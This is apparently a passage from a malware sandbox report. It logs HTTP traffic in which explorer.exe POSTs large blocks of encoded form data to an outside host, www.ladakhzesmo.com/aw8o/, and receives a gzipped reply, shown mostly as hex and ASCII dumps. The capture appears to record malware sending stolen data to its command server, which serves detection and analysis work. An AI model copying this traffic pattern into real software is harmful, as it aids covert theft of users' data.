6d 36 84 7c b0 c7 3e 19 4c 18 bb b5 e7 ee c1 39 32 6a b7 67 65 fc 4d 9e 0f 3a bd c5 a8 db 29 8d 9c d9 0d 62 ee 61 b9 21 97 37 97 cd d9 75 69 78 bb 28 ba 9b db 0e eb 4f 66 4d 6e 17 cb e7 fd 42 e7 b8 6c db be dd b1 8b 8b f5 c2 99 1c e3 0a 7f d1 84 5d bb 73 db 1d f6 ed cb 45 84 0a ac ef 76 37 e6 c7 a5 a9 9d 25 be 7a 55 71 19 b8 07 1d 86 21 e6 6e 8b 50 e6 66 52 39 62 25 bd 4c b2 bd c0 4b 7c 88 c5 56 30 70 6a 9a 40 db 72 17 7b 94 63 57 03 1f 3f be e6 4e 4d 4d cb 46 94 bb 41 a4 ab 20 d4 59 80 60 b2 61 f3 7b 41 ed 29 06 10 c9 60 21 b2 8f 4f 4f af 4e f9 70 02 5e 4e dd c7 0a 82 64 03 39 fc b0 a5 3b 53 6b 05 5c c5 33 e6 9c 78 0e 0d a0 34 7a b1 13 51 3e ab 01 44 a0 90 58 99 5b e5 e5 3e 6b c6 2f 6c 1c fa b1 ff 76 14 47 61 20 d4 1b 8e d4 00 2e de 51 84 73 cf c1 27 40 39 55 14 b2 9c 44 90 61 b3 f0 09 6c 25 16 cf 11 5c c6 00 0f 80 24 82 f2 4d 4e 05 39 8f aa 18 d0 de 36 64 71 0a 90 d8 35 a9 8d 64 ec 23 2f 6e 27 f5 55 10 ac 18 86 21 4d 5d 84 a4 fc ea 41 9f b2 83 39 0e c2 90 72 f9 a5 94 cf 6b b1 d9 99 a9 3d db 53 12 8c d5 4f dc 8a 2a 86 1b 0c ba 70 43 8e 58 fa 41 c2 54 37 52 f8 fd 0c ef 89 5e 86 32 0c aa 23 97 87 50 6c 9e e7 50 04 fb 58 1a 02 af a8
                                                                                                                                                                                          Data Ascii: R]s8}L|&OKF2#d4M}Y=xt>~q306W-2Kg=2RHJz Vc\s*Wk.T0%f6FQ{rWdlNMdE7Vi]/tgPg"A<;J?B*Izo[V&C7;}XC;-+X4/\+Z?WE#Ms|~WZLyd+iO&[qvFij`3.VV\?mDCMM2pSTkpF4H^}=rQ^_3mr]F*}THi,Xm%bP0AGC;'QFl--:0LWDZ>k?g"*.O\\O&T[$Mg6-^,ot.wxs=X_ppsaem6|>L92jgeM:)ba!7uix(OfMnBl]sEv7%zUq!nPfR9b%LK|V0pj@r{cW?NMMFA Y`a{A)`!OONp^Nd9;Sk\3x4zQ>DX[>k/lvGa .Qs'@9UDal%\$MN96dq5d#/n'U!M]A9rk=SO*pCXAT7R^2#PlPX
                                                                                                                                                                                          Aug 10, 2023 10:20:22.694484949 CEST1033INData Raw: 54 02 0a a3 fc b9 5a ad 5c e8 f1 7c 1a 78 2b 65 7a ab 1b 04 43 f7 05 ae 27 b6 79 b9 bf fd d6 d3 ad 82 c4 39 2f 8b 5a c3 1d 4c 51 ad b1 83 02 a0 64 27 20 36 52 da 4e ab 81 04 95 1b b1 22 2c 4c f0 c3 fe 6a 38 ad ee 20 39 96 2e e7 6b 32 b2 21 dd 6f
                                                                                                                                                                                          Data Ascii: TZ\|x+ezC'y9/ZLQd' 6RN",Lj8 9.k2!owfQt,*v&Ybg{#Jlqsi@C]`t2x_-\'JI~<@ w6V)-G\>Kf'",Du{xgQ Y7


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                          29192.168.11.2049744119.18.54.5180C:\Windows\explorer.exe
                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                          Aug 10, 2023 10:20:23.435220003 CEST1046OUTPOST /aw8o/ HTTP/1.1
                                                                                                                                                                                          Host: www.ladakhzesmo.com
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Origin: http://www.ladakhzesmo.com
                                                                                                                                                                                          Referer: http://www.ladakhzesmo.com/aw8o/
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 52914
                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                                                                                                                                          Data Raw: 31 4e 4d 36 65 3d 45 46 61 4b 46 50 67 75 51 54 33 78 34 69 6c 4d 65 52 2b 4a 6c 65 6c 49 37 33 4e 4a 7a 48 4a 61 49 46 72 61 68 4c 48 63 35 30 44 66 70 41 6b 59 50 6c 34 52 45 52 32 36 5a 61 4c 72 50 74 56 4c 54 39 7a 70 38 54 72 2f 45 55 63 2f 77 6e 68 71 72 66 37 37 6c 34 74 43 62 4a 50 78 31 6b 52 48 41 6a 61 4b 77 75 75 59 55 6c 2f 35 75 50 59 39 33 4e 58 69 4a 48 54 31 44 6a 42 5a 55 4c 39 67 61 76 45 72 47 6e 6b 76 48 36 69 49 45 59 4a 51 46 4e 51 49 70 49 70 4d 78 66 44 6f 58 30 39 51 36 58 75 58 2b 31 50 4b 62 69 76 71 75 75 50 55 4c 65 48 46 58 77 65 47 5a 75 78 6f 79 44 56 49 66 70 74 56 64 74 62 32 55 59 78 39 53 46 6e 7a 48 4a 5a 71 45 38 4a 35 54 38 4d 65 67 6a 32 70 2b 59 44 31 31 56 79 4c 63 2f 67 53 62 5a 71 49 67 73 33 45 75 4e 74 4b 64 34 6b 44 77 57 61 69 77 56 79 4d 45 31 76 42 78 64 73 62 67 44 51 2b 43 49 45 63 4a 62 64 4e 6d 51 35 57 59 55 61 75 7a 6b 39 63 6b 51 66 70 67 6d 35 78 35 6b 6d 77 35 78 43 6e 56 66 76 73 4a 53 75 75 39 74 77 51 69 64 53 49 75 37 6b 47 48 2b 59 66 77 34 62 61 2f 4b 6e 71 48 47 32 42 56 4c 6f 54 37 45 2b 6b 53 55 33 4a 78 43 78 74 50 6e 78 61 6b 51 69 52 64 30 34 73 38 49 79 76 43 53 38 37 4a 71 65 78 54 6b 53 70 44 33 52 79 30 36 72 4c 47 2b 47 77 5a 6b 75 43 4e 5a 54 77 57 46 47 67 50 59 2b 36 2b 6a 76 31 42 66 44 44 37 6d 7a 76 56 59 77 4d 56 5a 6c 33 62 42 4b 65 4a 63 44 4c 70 2b 43 33 4c 6a 79 48 73 4a 4d 69 36 52 69 39 48 75 55 4a 4c 74 75 69 67 42 78 57 72 78 43 76 54 6b 69 43 79 44 56 34 33 67 79 6e 57 6e 52 57 4f 6f 39 4e 74 41 79 56 6e 49 6b 71 4a 6b 4b 49 6b 63 78 45 50 37 74 45 48 6f 34 76 42 46 66 33 46 6f 4d 4e 75 31 4b 70 6b 68 47 32 56 41 62 4e 31 59 55 54 73 77 69 70 68 68 44 6b 45 68 77 6c 58 63 79 63 4e 64 78 76 4e 66 51 42 77 32 4e 67 72 35 58 6f 6b 54 6b 72 31 53 43 4e 68 31 4a 6d 64 54 75 37 72 6f 46 2b 61 75 47 6d 78 46 2b 2b 38 5a 39 79 47 6b 33 79 68 55 41 73 65 6c 76 78 33 79 37 36 4f 50 62 76 6b 48 61 33 56 6e 62 2f 45 5a 75 66 68 59 46 30 6e 64 59 45 6e 6c 41 55 75 72 71 36 41 45 63 75 2b 2f 50 4b 73 2f 75 2b 44 6a 77 74 35 31 57 30 41 76 4c 33 58 71 4c 34 73 44 43 4d 44 32 67 36 32 54 32 4b 65 4c 41 65 73 6c 45 4d 49 2b 37 70 66 58 61 47 7a 50 47 63 67 48 36 38 2f 53 4e 47 32 42 44 36 54 47 45 48 59 70 47 45 73 6d 34 62 55 4d 71 6a 61 47 4a 78 57 32 4c 72 69 5a 4e 59 7a 43 74 47 32 71 45 6a 34 34 41 2b 61 36 41 31 56 70 62 48 36 45 50 44 6c 66 53 4d 52 42 75 4d 57 33 55 6a 6e 35 34 6d 53 38 48 63 56 4d 73 54 2f 57 4d 69 53 62 72 4a 76 64 76 72 79 37 62 4d 38 36 41 4e 6f 55 31 62 2f 46 66 4c 43 78 63 74 77 44 56 4e 33 6b 48 4f 63 5a 4b 41 78 6f 68 44 4d 31 38 61 4d 56 6f 4d 48 4b 6d 73 61 46 6e 4c 78 47 69 6d 74 43 35 65 6e 44 69 56 39 43 68 45 71 74 42 74 51 61 52 6a 79 67 70 70 71 2b 52 4d 6e 50 41 35 57 75 48 74 74 42 65 5a 4b 6d 39 7a 70 45 6a 32 75 6a 7a 61 56 50 6f 68 55 6c 57 4f 38 54 76 67 79 32 75 72 38 72 46 75 6b 49 31 4f 77 34 31 55 4c 38 49 48 58 37 6c 4e 32 43 39 39 55 6a 39 74 31 71 34 73 6b 30 4d 7a 6c 69 52 66 32 4d 51 6e 33 6b 69 58 36 6f 41 56 4a 42 49 43 42 4d 37 70 79 49 33 54 6a 6c 49 70 6a 52 35 51 77 31 50 6e 52 74 4c 6c 68 45 52 43 58 4d 48 68 66 43 77 2b 37 59 5a 31 66 41 53 6d 6c 38 66 4e 52 44 58 69 5a 68 61 56 49 6e 6e 6e 38 6b 73 50 4f 75 6c 34 72 67 39 7a 77 46 44 70 6d 38 63 51 56 32 73 33 52 37 64 73 6f 79 55 47 2f 57 78 55 79 6c 72 4b 6a 72 79 30 78 32 36 7a 75 48 2b 6e 4c 51 42 6b 74 69 45 35 73 37 62 74 30 36 59 4c 68 6f 50 36 33 65 69 47 30 34 69 34 57 74 57 37 69 31 37 4c 74 31 74 41 71 70 64 44 30 43 31 45 52 52 50 30 69 56 63 55 6b 4e 45 7a 49 49 70 65 7a 33 45 67 79 41 65 2b 72 2f 4d 47 32 6c 78 4a 31 46 37 31 6f 2f 31 41 30 68 2b 69 71 77 65 52 49 70 45 6b 6f 2b 51 6a 73 46 70 79 4e 4e 4f 42 57 6f 64 77 34 45 6b 68 75 4c 34 4b 6e 7a 4f 5a 50 4f 42 7a 79 4c 32 55 57 4c 75 2f 6b 6e 52 79 48 31 57 4f 31 6b 67 30 45 39 68 77 55 31 48 35 67 56 4c 76 61 6d 6f 47 7a 6f 48 71 31 33 6b 42 4f 66 71 31 49 72 73 76 58 50 57 54 56 46 6a 4c 67 4b 6e 4f 41 58 44 42 4b 35 53 67 30 61 67 35 4d 7a 38 37 54 4e 6a 39 54 73 71 38 31 39 38 58 71 4c 43 51 4e 49 68 69 6c 32 2f 72 34 4e 52 58 4d 69 50 31 48 34 67 54 64
                                                                                                                                                                                          Data Ascii: 1NM6e=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
                                                                                                                                                                                          Aug 10, 2023 10:20:23.562947989 CEST1052OUTData Raw: 77 73 52 51 4f 79 57 45 4c 72 76 37 48 50 38 4a 51 4e 46 73 34 6a 4e 64 4b 61 72 5a 58 46 4c 37 76 58 47 39 43 63 78 39 54 71 39 75 45 56 53 75 30 4f 50 67 77 64 55 36 6a 66 6b 58 41 6a 30 73 39 64 57 4d 36 66 77 68 36 55 4e 58 53 56 54 56 5a 4c
                                                                                                                                                                                          Data Ascii: wsRQOyWELrv7HP8JQNFs4jNdKarZXFL7vXG9Ccx9Tq9uEVSu0OPgwdU6jfkXAj0s9dWM6fwh6UNXSVTVZLKXH2UeSxGMp5SpcnoE0SjMCVffhQWzYm+paWP/Oo6VxUSoy27p0PAZNidmk8LojMbB15D1KicFPJlZfXyCWk51xbSL16AmbHPfjKB6KvUyu1X5ESm8OIk5AtF1eUVIXatuxrqx311J/BSg6lZJMjDps04nw/nJJ2J
                                                                                                                                                                                          Aug 10, 2023 10:20:23.563141108 CEST1072OUTData Raw: 52 73 51 55 5a 36 4d 57 79 53 31 33 6c 4c 37 53 33 68 57 33 38 71 32 4d 4e 4f 41 49 70 44 57 2f 56 34 72 68 42 49 53 31 61 46 53 66 75 4b 35 36 39 78 64 43 35 58 4f 52 38 4c 35 63 54 6e 72 2f 53 37 32 2f 7a 59 70 7a 61 67 79 34 52 52 65 6e 2b 6a
                                                                                                                                                                                          Data Ascii: RsQUZ6MWyS13lL7S3hW38q2MNOAIpDW/V4rhBIS1aFSfuK569xdC5XOR8L5cTnr/S72/zYpzagy4RRen+jVmsUzeEWs56pN+YwG3Z2dUSc7Z4O0gJ4WFkiBEXOuvguAqTFtYM9LbAiMG/Y2BzWqdWig5JFCBgeWIHJt9QxCPLcmKtt8rUZdlAxaUUXYcZSkP5hCsSN97RscGmdpR5uV3ppTfpFqlr9LIRU6UVnFJw445yze4B6S
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687136889 CEST1075OUTData Raw: 67 50 51 6d 52 6b 46 32 33 71 36 4b 52 55 30 33 52 70 62 4d 30 6e 75 34 37 47 73 70 4d 77 52 70 32 55 73 47 65 55 4e 56 78 42 5a 38 43 42 4c 64 4f 49 37 4b 6b 47 66 4c 75 4c 76 74 57 4e 4d 4c 68 4a 4d 34 35 34 2b 72 6f 53 2f 32 69 41 4f 6d 6d 6b
                                                                                                                                                                                          Data Ascii: gPQmRkF23q6KRU03RpbM0nu47GspMwRp2UsGeUNVxBZ8CBLdOI7KkGfLuLvtWNMLhJM454+roS/2iAOmmk1wyP3CeKudSi8/stvq8V4Y6tBJPcG5j0X6c6pOMgk0nfKuhQCsXam4v5nLWfRwnRc5LpUNXtpyWl8hWo93Bej9ChtHvKobCUIRoxx36QJQmFrQ3V2ka1oHUm14ts1vOF7WkYSmrDtuq1cBephiucJ7BWvz01fJZ2T
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687329054 CEST1080OUTData Raw: 4b 73 6b 55 2f 35 6a 33 50 35 43 38 55 67 44 49 4f 68 64 49 2f 4e 5a 78 4e 36 54 4d 4f 78 4c 58 2f 4e 2b 6e 46 58 47 68 63 34 6b 57 69 4b 34 44 67 74 2b 46 67 4d 70 65 4e 5a 42 30 67 46 4e 61 33 51 48 48 58 5a 79 59 61 2f 4a 4f 6f 6e 62 35 39 6b
                                                                                                                                                                                          Data Ascii: KskU/5j3P5C8UgDIOhdI/NZxN6TMOxLX/N+nFXGhc4kWiK4Dgt+FgMpeNZB0gFNa3QHHXZyYa/JOonb59ktzbPOb0HBjOOXyjS+TqtENsxNbJ0w39gAIYDuG10TufP5s6slWOgVg3aW4ml4EGgjX5Uezfj73Vj/XHty4OznWubcyWfvcYEpQ+TD5Y8lsxVe5UminNQFOxbVeqKDgnbjOeaWzXufW8ACII+2mrD8TQXY2QBuTFQs
                                                                                                                                                                                          Aug 10, 2023 10:20:23.687424898 CEST1087OUTData Raw: 47 6c 64 6b 57 35 63 7a 42 57 35 2f 6f 66 55 4e 30 42 37 36 44 4e 44 68 6c 53 4f 4b 2b 38 4d 6a 35 6d 36 4b 71 66 71 75 31 61 68 6f 66 41 2f 6b 37 79 67 45 56 58 63 73 6b 69 72 6a 66 75 37 30 69 78 37 61 66 77 59 4b 51 45 4c 61 4c 49 4e 78 4f 67
                                                                                                                                                                                          Data Ascii: GldkW5czBW5/ofUN0B76DNDhlSOK+8Mj5m6Kqfqu1ahofA/k7ygEVXcskirjfu70ix7afwYKQELaLINxOgBgmp9vDNpfH+PtnKfP8sqZyT15r+NyTl29VHdKKcOenT8Eq9OWvtqkQoeeoXZzO76rrxEAXGHMIa3x/PZbyJ4jK+lUcSOKrNsvz4myyE3keIZa7cX18jvV9qHTNZ5eXD+iyyom2JyyBCdknKy4WUopjmJDhxO/yuw
                                                                                                                                                                                          Aug 10, 2023 10:20:25.425239086 CEST1089INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Thu, 10 Aug 2023 08:20:23 GMT
                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                          Content-Length: 1225
                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b5 52 db 72 e2 38 10 7d 4f d5 fc 83 e2 aa 9d 82 ca 60 73 49 48 18 30 53 e6 e2 10 c2 cd 60 02 e1 25 25 24 19 1b 64 cb 91 04 06 52 f9 f7 b5 e3 4c 26 93 99 d9 dd 97 d5 83 4b 7d ba 7d ba 75 fa 7c 3a 01 f1 a9 9d b6 86 4d fb 7e d4 06 ae f4 29 18 4d 1b bd 9b 26 50 72 9a 36 2b 35 35 ad 65 b7 c0 bc 63 f7 7b a0 a0 e6 81 cd 61 20 3c e9 b1 00 52 4d 6b 0f 94 4f 2f 1c c9 51 5c 29 c3 af 9a 16 45 91 1a 95 54 c6 57 9a 3d d6 f6 09 69 21 61 79 bd e6 e4 3b 0a 15 4b ac d4 53 8e da 4b 7b 0c 25 cc 41 bc a4 0c 6d 36 e4 a0 2b 7d 33 8a 5a d6 7d f7 96 2d 6e dc 1d 1a 18 56 bb d1 b0 8c d6 24 32 a2 89 d1 6d 18 b7 f3 cb 73 6f 1f 1e ef 0e f3 65 37 e4 a8 e7 2c 3b e7 a1 18 9d 9f f5 8a 24 90 8f dc cb d3 a3 5b 0e 37 06 9c f7 46 37 08 d1 5d b9 65 35 48 b7 bb be 36 67 bc 71 63 96 ad fe c1 8c e6 f6 45 b3 39 3e ac 27 c5 90 04 ed a6 11 b5 0d c3 d2 f5 87 f1 62 bc 2f dc 1e f7 c3 c2 55 93 16 8d 7e 65 de 9b 8e ca 67 f4 b2 5c d9 8d 90 53 70 2c d9 6f 5f 3a c1 66 3e bf 2f ad 78 cf b6 a7 e3 f5 23 ec 3a dd b0 a4 91 1b 31 9e fa 65 64 58 bd 32 2e 97 5b ce f0 5e 3b 9b 85 91 a1 eb 0a d8 fb 34 10 fa 6f 74 2b 54 2a 95 54 ae 1f e2 10 88 eb a0 26 10 f7 42 09 e4 21 24 ba 22 c9 5e 6a 6b b8 83 29 aa d4 77 90 03 b8 0c ab 35 2d 45 ea ff 5c 0f 04 47 6f ed c9 3e a4 8c 13 87 13 c2 89 d8 52 29 54 c4 7c 2d dc ab 6b f1 0d b9 7a 41 a9 ff 1f b4 c5 ff 4c 5b 77 b6 01 4a 6c 03 5c 18 60 4a 8c c6 a8 45 24 41 32 93 7d 92 fc f0 e4 39 99 d3 f8 f1 59 c0 89 dc f2 a0 9a 88 e1 f9 2b ca 56 40 07 98 a1 ad 1f bb 41 45 9c 40 49 da 94 24 51 46 89 0b 94 6c 35 2d 53 85 3c 50 a2 ba c4 5b b9 52 57 f2 e1 5e f9 39 13 79 58 ba 1f 12 ff fe 54 b1 c9 c5 95 f1 64 42 42 b9 15 6a e8 86 df a0 3e 58 df ef a6 33 73 6e 1d dd 05 6a 8b e3 a2 bd d9 93 e9 94 a3 f6 78 3a 9c ca db e1 75 41 e2 cd de bf cb 87 9d 01 0d 59 ff 7a d0 1a f8 e6 2d 9c 0d c4 b8 bd 2a 8e e7 46 09 17 c2 09 be ae f4 27 77 dd 3e ee 60 13 5d 5b c5 49 cb ed 0e f2 17 62 62 2e e0 32 1f 5d dc d9 dd 31 e9 58 dc 6e 2d c4 a2 43 b7 e3 29 3b 9f cd ba 26 b6 17 b3 be bd b8 c1 9b c5 e4 ae 3d 18 ce a6 8b c8 f2 69 b9 3f 2d 14 ad 20 ce 15 f0 dc 2a d0 a2 5d b0 f4 cf 4b 5d 39 4b 7c f5 a6 e2 92 e1 83 0a c3 90 04 b8 e9 7a 14 67 52 39 62 25 9d 4c b2 3d e6 24 3e 24 7c cb 29 38 d5 75 a0 6c 03 4c 1c 2f 20 58 01 9f 3f bf e5 4e 75 45 c9 46 5e 80 59 a4 4a 16 aa 94 21 98 6c 58 ff 5e 50 7d 8e 01 e4 66 08 e7 d9 a7 e7 e7 37 a7 7c 3a 01 af a7 e6 13 09 41 b2 81 1c 79 dc 7a 3b 5d 69 b2 40 c6 33 e6 ec 78 0e 05 a0 34 7a b5 93 2b 7d 5a 05 c8 85 5c 10 a9 6f a5 93 bb 52 b4 5f d8 02 e8 c7 fe db 79 24 0a 19 97 ef 38 52 03 60 b2 f3 10 c9 bd 04 5f 80 17 78 d2 83 34 27 10 a4 44 2f 7c 01 5b 41 f8 4b 04 97 31 10 30 20 5c ee 05 9b 9c 64 39 c7 93 31 a0 bc 6f 48 e3 14 70 63 d7 a4 36 12 b1 8f 9c b8 9d 50 57 8c ad 28 81 a1 97 ba 08 09 f1 cd 81 be 47 0f fa 88 85 a1 17 88 af a5 7c 5e 89 cd 4e 75 e5 c5 9e c2 25 44 fe c4 2d 3d 49 49 9d 42 0c 37 ee 91 08 9f 25 4c 35 2d 85 3f ce f0 91 e8 75 28 4d f3 54 84 83 10 f2 cd cb 1c d2 25 3e 11 1a 27 2b 4f
                                                                                                                                                                                          Data Ascii: Rr8}O`sIH0S`%%$dRL&K}}u|:M~)M&Pr6+55ec{a <RMkO/Q\)ETW=i!ay;KSK{%Am6+}3Z}-nV$2msoe7,;$[7F7]e5H6gqcE9>'b/U~eg\Sp,o_:f>/x#:1edX2.[^;4ot+T*T&B!$"^jk)w5-E\Go>R)T|-kzAL[wJl\`JE$A2}9Y+V@AE@I$QFl5-S<P[RW^9yXTdBBj>X3snjx:uAYz-*F'w>`][Ibb.2]1Xn-C);&=i?- *]K]9K|zgR9b%L=$>$|)8ulL/ X?NuEF^YJ!lX^P}f7|:Ayz;]i@3x4z+}Z\oR_y$8R`_x4'D/|[AK10 \d91oHpc6PW(G|^Nu%D-=IIB7%L5-?u(MT%>'+O
                                                                                                                                                                                          Aug 10, 2023 10:20:25.425261974 CEST1089INData Raw: 48 0e b9 76 7e 55 a9 94 2f d5 78 3e 05 bc 97 32 bd d5 34 97 40 fc 0a d7 12 db bc de df 7f 6b e9 56 41 e2 9c d7 45 ad e1 0e a6 a8 52 df 41 0e 50 b2 13 10 1b 29 6d a7 54 41 82 8a 0d 5f b9 34 4c f0 ca fe d6 36 e5 9d 33 32 fd cd 74 d2 18 b2 0e 33 d7
